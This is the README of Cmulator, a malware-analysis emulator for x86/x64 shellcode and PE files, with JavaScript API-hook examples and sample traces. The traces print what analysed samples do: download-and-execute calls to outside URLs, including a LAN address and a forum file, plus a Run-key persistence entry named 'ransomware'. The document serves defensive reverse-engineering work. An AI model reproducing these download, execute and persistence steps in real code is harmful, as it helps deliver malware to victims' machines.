Cmulator is ( x86 - x64 ) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries . Based on Unicorn & Capstone Engine & javascript
Switch branches/tags
Nothing to show
Clone or download
Latest commit 8c58e32 Sep 29, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Build init beta version Sep 29, 2018
Core init beta version Sep 29, 2018
samples nothing important :D Sep 29, 2018
.gitignore Samples for testing 👍 Sep 29, 2018
Cmulator.lpi init beta version Sep 29, 2018
Cmulator.lps init beta version Sep 29, 2018
Cmulator.pas init beta version Sep 29, 2018
LICENSE Initial commit Sep 15, 2018
README.md init beta version Sep 29, 2018

README.md

Cmulator - Scriptable x86 RE Sandbox Emulator

License: AGPL v3

Cmulator is ( x86 - x64 )
Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries
Based on Unicorn & Capstone Engine & javascript .

Supported Architectures:

  • i386
  • x86-64

Supported File Formats

  • PE, PE+
  • shellcodes

Known problems

  • there's a bug in Unicorn modifying data near EIP
    if anyone can help please check unicorn#820

Current Features

  • Simulated GDT & Segments .
  • Simulated TEB & PEB structures for both Shellcodes and PE .
  • Simulated LDR Table & Data .
  • Manages Image and Stack memory .
  • Evaluates functions based on DLL exports .
  • Trace all Executed API ( good for Obfuscated PE) .
  • Displays HexDump with Strings based on referenced memory locations .
  • Patching the Memory .
  • Custome API hooks using Javascript (scripting) .
  • Handle SEH (still need more work) .



Hook Example JavaScript

var GetModuleFileName = new ApiHook();
/*
DWORD WINAPI GetModuleFileName(
  _In_opt_ HMODULE hModule,
  _Out_    LPTSTR  lpFilename,
  _In_     DWORD   nSize
);
*/
GetModuleFileName.OnCallBack = function (Emu, API, ret) {

	Emu.pop(); // ret
	
	var hModule    = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
	var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
	var nSize	   = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();

	var mName = Emu.GetModuleName(hModule);
	var Path = 'C:\\pla\\' + mName;

	var len = API.IsWapi ? Emu.WriteStringW(lpFilename,Path) : Emu.WriteStringA(lpFilename,Path);

	// null byte - mybe needed maybe not :D - i put it anyway :V 
	API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2),0) : Emu.WriteByte(lpFilename+len,0);

	print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(
		API.name,
		hModule.toString(16),
		lpFilename.toString(16),
		nSize.toString(16),
		Path
	));

	// MS Docs : the return value is the length of the string
	Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);	
	Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
	return true; // true if you handle it false if you want Emu to handle it and set PC .
};

GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');
var _vsnprintf = new ApiHook();
/*
int _vsnprintf(  
   char *buffer,  
   size_t count,  
   const char *format,  
   va_list argptr   
);
*/
_vsnprintf.OnCallBack = function (Emu, API, ret) {

	// save the param to args
	// args is an Array and it's implemented in every ApiHook .
	_vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);

	// i think implementing this in JS is hard 
	// so just let the library handle it :D 
	return true; // True so we continue to the lib code .
};

// OnExit Callback ..
_vsnprintf.OnExit = function(Emu,API){
	
	// Read Our Saved Param .
	var buffer = _vsnprintf.args[0];

	warn("OnExit : _vsnprintf() = '{0}' ".format(
		Emu.ReadStringA(buffer)
	));
}

_vsnprintf.install('msvcrt.dll', '_vsnprintf');


Example Output :

AntiDebug Downloader

Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 01:51:51
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"AntiDebugDownloader.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : AntiDebugDownloader.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000004000
[---------------------------------------]

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : AntiDebugDownloader.exe
[*] Import 3 Dlls

[+] Fix IAT for : kernel32.dll

[+] Fix IAT for : urlmon.dll

[+] Fix IAT for : advapi32.dll

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 52 Libraries ...

[>] Run AntiDebugDownloader.exe

0x401005 : IsDebuggerPresent = 0
GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows' 
0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)
0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144
0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)
0x40107a : RegCloseKey()
ExitProcess(0x0)

26 Branches - Executed in 9 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯

x64 Down & Exec ShellCode

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc64.exe" is : x64
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : sc64.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : sc64.exe
[*] Import 0 Dlls

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 25 Libraries ...

[>] Run sc64.exe

LoadLibraryA('urlmon') = 0x70714000
GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10
0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880)
SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2)
WinExec('C:\\Users\\Public\\p.exe', 0)
FatalExit(0x0)

95 Steps - Executed in 295 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯


x32 Down & Exec ShellCode

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc32.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : sc32.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : sc32.exe
[*] Import 0 Dlls

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 25 Libraries ...

[>] Run sc32.exe

GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7
LoadLibraryA('urlmon.dll') = 0x7065a000
GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0
GetProcAddress(0x70300000,'WinExec') = 0x70392C21
0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0)
WinExec('dead.exe', 1)

3041 Steps - Executed in 415 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯


Show SEH handling (PELock Obfuscator)

Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"obfuscated.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : obfuscated.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers  : 0000000000001000
[*] Size Of Image    : 000000000000F000
[---------------------------------------]

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : obfuscated.exe
[*] Import 2 Dlls

[+] Fix IAT for : KERNEL32.dll

[+] Fix IAT for : USER32.dll

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 44 Libraries ...

[>] Run obfuscated.exe

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0
0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215
ZwContinue -> Context = 0x25F97C
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516
ZwContinue -> Context = 0x25F978
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE
ZwContinue -> Context = 0x25F974
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B
ZwContinue -> Context = 0x25F984
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461
ZwContinue -> Context = 0x25F984
ExitProcess(0x0)

7387 Steps - Executed in 118 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯


Hide SEH handling (PELock Obfuscator)

Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe 

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"obfuscated.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : obfuscated.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers  : 0000000000001000
[*] Size Of Image    : 000000000000F000
[---------------------------------------]

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : obfuscated.exe
[*] Import 2 Dlls

[+] Fix IAT for : KERNEL32.dll

[+] Fix IAT for : USER32.dll

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 44 Libraries ...

[>] Run obfuscated.exe

MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
ExitProcess(0x0)

7387 Steps - Executed in 116 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯



And Try it Your Self , find it at "samples/obfuscated/obfuscated.exe" 😉

WIP BY Priority :

  • Memory Manager
  • Checking for Bug & fixing them 👌🏻

TODO BY Priority :

  • PC (RIP - EIP) Hook .
  • improving exception handling.
  • Native Plugins & API Hook Libs .
  • Interactive debug shell.
  • Add Assembler.
  • Implement Threading.

Requirements

  • Freepascal >= v3
  • Unicorn Engine
  • Capstone Engine

Installation

  • Install Lazarus IDE
  • You will find all needed libraries in "libraries" Folder ;)
  • Now Build

Build

1. Build Cmulator

This command will also create other binaries such as pesymbols ans peinfo.

git clone https://github.com/Coldzer0/Cmulator.git

Open "Cmulator.lpi" with Lazarus IDE 

Then Hit Compile :D
Oh Before that you need to select the Build Mode

From Laz IDE Select 

Projects -> Project Options -> Compiler Options 

and Select the Mode for your OS .

Or Just Download From Releases



2. Create config.json config file

touch config.json

3. Set Win dlls Path

set the dll folders to where you stored your windows dlls and JS Main File .

{
  "system": {
    "win32": "../win_dlls/x32_win7",
    "win64": "../win_dlls/x64_win7"
  },
  "JS": {
  	"main": "../API.JS"
  }
}

Run

./Cmulator -file samples/AntiDebug.exe

Documentation

Still working on it , will be available soon .


Resources :

this work inspired by :

  • unicorn-libemu-shim - The Main Reason i started this Project ❤ .
  • LIBEMU - Hooking Methods .
  • SCDBG - The InterActive Debugger .
  • xori - I Used there Method To Build LDR .

Used OpenSource Projects :

Resouces Used :